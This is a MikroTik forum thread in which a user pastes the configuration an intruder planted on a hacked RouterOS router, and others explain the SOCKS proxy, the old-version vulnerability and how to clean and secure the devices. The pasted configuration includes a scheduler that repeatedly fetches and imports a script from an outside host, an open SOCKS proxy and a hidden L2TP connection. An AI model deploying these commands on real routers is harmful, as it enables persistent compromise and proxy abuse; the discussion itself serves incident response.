Community discussions

MikroTik App
 
David1234
Forum Guru
Forum Guru
Topic Author
Posts: 1424
Joined: Sun Sep 18, 2011 7:00 pm

What is IP SOCKS ? I got hacked and they open this

Thu Jan 28, 2021 3:42 pm

Hello ,
what does IP-SOCKS used for?

someone enter my router last night and add this setting
/ip firewall filter
add action=accept chain=input dst-port=5678 protocol=tcp

/ip service
set ssh  port=26711
set api  disabled=yes
set winbox disabled=yes

/ip socks
set enabled=yes port=5678
/ip socks access
add src-address=77.238.240.0/24
add src-address=178.239.168.0/24
add src-address=77.238.228.0/24
add src-address=94.243.168.0/24
add src-address=213.33.214.0/24
add src-address=31.172.128.45
add src-address=31.172.128.25
add src-address=10.0.0.0/8
add src-address=185.137.233.251
add src-address=5.9.163.16/29
add src-address=176.9.65.8
add src-address=82.202.248.5
add src-address=95.213.193.133
add src-address=136.243.238.211
add src-address=178.238.114.6
add src-address=46.148.232.205
add src-address=138.201.170.176/29
add src-address=95.213.221.0/24
add src-address=159.255.24.0/24
add src-address=31.184.210.0/24
add src-address=188.187.119.0/24
add src-address=188.233.1.0/24
add src-address=188.233.5.0/24
add src-address=188.233.13.0/24
add src-address=188.232.101.0/24
add src-address=188.232.105.0/24
add src-address=188.232.109.0/24
add src-address=176.212.165.0/24
add src-address=176.212.169.0/24
add src-address=176.212.173.0/24
add src-address=176.213.161.0/24
add src-address=176.213.165.0/24
add src-address=176.213.169.0/24
add src-address=5.3.113.0/24
add src-address=5.3.117.0/24
add src-address=5.3.121.0/24
add src-address=5.3.145.0/24
add src-address=5.3.149.0/24
add src-address=5.3.153.0/24
add src-address=5.167.9.0/24
add src-address=5.167.13.0/24
add src-address=5.167.17.0/24
add src-address=94.180.1.0/24
add src-address=94.180.5.0/24
add src-address=94.180.9.0/24
add src-address=217.119.22.83
add src-address=192.243.53.0/24
add src-address=176.9.65.8
add src-address=135.181.15.102
add src-address=198.18.0.0/15
add src-address=139.99.94.160/29
add action=deny src-address=0.0.0.0/0

/system scheduler
add interval=3m name=U6 on-event="/tool fetch url=http://zancetom.com/poll/6db\
    69e09-de68-4ca0-a9e7-363827bffb82 mode=http dst-path=7wmp0b4s.rsc\r\
    \n/import 7wmp0b4s.rsc" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
    startup

and also open L2TP client :

connect to : s38.eeongous.com
user: user4939176
password: user4939176
what is the damage of what he did ?
also what does the ip sock help him ?

Thanks,
 
User avatar
eworm
Forum Guru
Forum Guru
Posts: 1070
Joined: Wed Oct 22, 2014 9:23 am
Location: Oberhausen, Germany
Contact:

Re: What is IP SOCKS ? I got hacked and they open this

Thu Jan 28, 2021 3:58 pm

 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 26322
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: What is IP SOCKS ? I got hacked and they open this

Thu Jan 28, 2021 4:07 pm

David1234, there could be other things set up, better do a clean reinstall of this system.
 
David1234
Forum Guru
Forum Guru
Topic Author
Posts: 1424
Joined: Sun Sep 18, 2011 7:00 pm

Re: What is IP SOCKS ? I got hacked and they open this

Thu Jan 28, 2021 4:32 pm

I have reinstall to avoid problems

but I wnat to understand what does SOCKS do ?
can you explain in simple words?
also , what he gain from add this ?
 
Sob
Forum Guru
Forum Guru
Posts: 9119
Joined: Mon Apr 20, 2009 9:11 pm

Re: What is IP SOCKS ? I got hacked and they open this

Thu Jan 28, 2021 5:52 pm

It's a proxy server, similar to web proxy. They can use it to hide behind your router when they try to hack other devices. They will send request to proxy server on your router, it will send it to target, and target will think that it's you hacking them.
 
pe1chl
Forum Guru
Forum Guru
Posts: 10195
Joined: Mon Jun 08, 2015 12:09 pm

Re: What is IP SOCKS ? I got hacked and they open this

Thu Jan 28, 2021 6:25 pm

Note that the hack is likely an indication of a bad firewall on your router.
After you have re-installed it make sure you configure the firewall properly.
 
Sob
Forum Guru
Forum Guru
Posts: 9119
Joined: Mon Apr 20, 2009 9:11 pm

Re: What is IP SOCKS ? I got hacked and they open this

Thu Jan 28, 2021 6:43 pm

Even if there would be no firewall at all, router can't get hacked so easily. It would have to be another user error (missing or weak password), or something really wrong with RouterOS. That's nothing against firewall, it's of course good idea to have it.
 
pe1chl
Forum Guru
Forum Guru
Posts: 10195
Joined: Mon Jun 08, 2015 12:09 pm

Re: What is IP SOCKS ? I got hacked and they open this

Thu Jan 28, 2021 9:15 pm

Even if there would be no firewall at all, router can't get hacked so easily. It would have to be another user error (missing or weak password), or something really wrong with RouterOS. That's nothing against firewall, it's of course good idea to have it.
He was likely running an old version of RouterOS which has a known vulnerabilty that allows remote attackers to log in to the router no matter what the password is.
(indeed, there was something really wrong with RouterOS)

Of course we do not know if there still are such issues so it is recommended to not allow incoming connections to the router from internet unless absolutely necessary.
(that means that you could enable incoming connections to a VPN service but never to the admin interfaces like ssh, telnet, winbox, webfig. when you require remote admin you use a VPN)
 
Van9018
Long time Member
Long time Member
Posts: 558
Joined: Mon Jun 16, 2014 6:26 pm
Location: Canada - Abbotsford

Re: What is IP SOCKS ? I got hacked and they open this

Fri Jan 29, 2021 4:51 am

And set a password for winbox. I left it as just admin and someone's personal laptop set up a PPTP service on the Mikrotik along with vpn/vpn as the user/pass for the VPN.
Consider firewalling your winbox on the LAN side.
 
David1234
Forum Guru
Forum Guru
Topic Author
Posts: 1424
Joined: Sun Sep 18, 2011 7:00 pm

Re: What is IP SOCKS ? I got hacked and they open this

Sun Jan 31, 2021 9:23 am

Even if there would be no firewall at all, router can't get hacked so easily. It would have to be another user error (missing or weak password), or something really wrong with RouterOS. That's nothing against firewall, it's of course good idea to have it.
He was likely running an old version of RouterOS which has a known vulnerabilty that allows remote attackers to log in to the router no matter what the password is.
(indeed, there was something really wrong with RouterOS)

Of course we do not know if there still are such issues so it is recommended to not allow incoming connections to the router from internet unless absolutely necessary.
(that means that you could enable incoming connections to a VPN service but never to the admin interfaces like ssh, telnet, winbox, webfig. when you require remote admin you use a VPN)

you are right
the RouterOS is 6.40.1 , is it a problem?
I have many routers with this version (~ 50)

the password is not so easy (10 chars + 4 numbers no logic behind them - very very random ;-) )

will this help blocking? that way I allow only known (My own ) netwrok to enter the rotuer
/ip service
set telnet disabled=yes
set ftp address=10.0.0.0/24,172.16.0.0/16
set www address=10.0.0.0/24 disabled=yes
set ssh address=10.0.0.0/24,172.16.0.0/16 port=2222
set api address=10.0.0.0/24,172.16.0.0/16
set winbox address=10.0.0.0/24,172.16.0.0/16
set api-ssl disabled=yes



also can someone please show me a simple example of what does the IP SOCKS do?
I understadn it allow traffic between router and external server
I never heard about this before - so if someone use it - can he show me a simple example and used case for it ?

Thanks ,
 
pe1chl
Forum Guru
Forum Guru
Posts: 10195
Joined: Mon Jun 08, 2015 12:09 pm

Re: What is IP SOCKS ? I got hacked and they open this

Sun Jan 31, 2021 12:18 pm

the RouterOS is 6.40.1 , is it a problem?
I have many routers with this version (~ 50)
YES it is a BIG problem! With that version, people can walk in regardless of the complexity of your password.
You should update ASAP, and keep a bit more uptodate in the future.
However, I would not recommend to update to 6.48 (or any 6.xx version i.e. without extra .1 or higher) so for now it is best to upgrade to the long term version.
(currently 6.46.8)
the password is not so easy (10 chars + 4 numbers no logic behind them - very very random ;-) )
That does not matter, because in that version the attacker can download your password file before login and it contains your passwords in plaintext.
will this help blocking? that way I allow only known (My own ) netwrok to enter the rotuer
/ip service
set telnet disabled=yes
set ftp address=10.0.0.0/24,172.16.0.0/16
set www address=10.0.0.0/24 disabled=yes
set ssh address=10.0.0.0/24,172.16.0.0/16 port=2222
set api address=10.0.0.0/24,172.16.0.0/16
set winbox address=10.0.0.0/24,172.16.0.0/16
set api-ssl disabled=yes
I think it helps against this vulnerability but I am not sure. I always add firewall rules to disallow access to the router from internet as well.
also can someone please show me a simple example of what does the IP SOCKS do?
They now have established this site https://google.com/ where you can easily find answers to such generic questions... maybe sometime you should try it!
 
alucionet
just joined
Posts: 8
Joined: Fri Feb 26, 2010 4:18 am

Re: What is IP SOCKS ? I got hacked and they open this

Fri Mar 05, 2021 4:32 pm

I am seeing the same thing on multiple routers on my network.
Has anybody figured out what's going on?
It has strangely been able to get on other routers within my network, enables IP socks and disables winbox port.
So far, no other harm found.
 
tdw
Forum Guru
Forum Guru
Posts: 1843
Joined: Sat May 05, 2018 11:55 am

Re: What is IP SOCKS ? I got hacked and they open this

Fri Mar 05, 2021 4:51 pm

Yes, there were some well publicised vulnerabilities allowing remote unauthenticated access on devices which did not have firewall rules to restrict remote administrative access. It is good practice to only allow remote administrative access from a few known IP addresses, or better still via a VPN connection.

If some of your devices have been compromised the only reliable way to clean them is to use netinstall which completely erases the Mikrotik memory, and reconfigure from an export (.rsc file) NOT a backup (.backup file). Persistent changes can be made which are not visible through Winbox/Webfix/CLI, so cannot be removed, and are included in backups.
 
mada3k
Long time Member
Long time Member
Posts: 687
Joined: Mon Jul 13, 2015 10:53 am
Location: Sweden

Re: What is IP SOCKS ? I got hacked and they open this

Fri Mar 05, 2021 5:11 pm

6.40.1 is ancient. And never ever leave winbox or any other services open to Internet.
 
User avatar
anav
Forum Guru
Forum Guru
Posts: 19107
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada
Contact:

Re: What is IP SOCKS ? I got hacked and they open this

Fri Mar 05, 2021 5:41 pm

Not only is it ancient but its negligent not to have updated them.
IF you have over 50 devices you must be an installer and have some sort of maintenance responsibility.
After you kick yourself in the arse, suggest you need to netinstall all 50 of those devices.

Who is online

Users browsing this forum: CGGXANNX, seriosha and 73 guests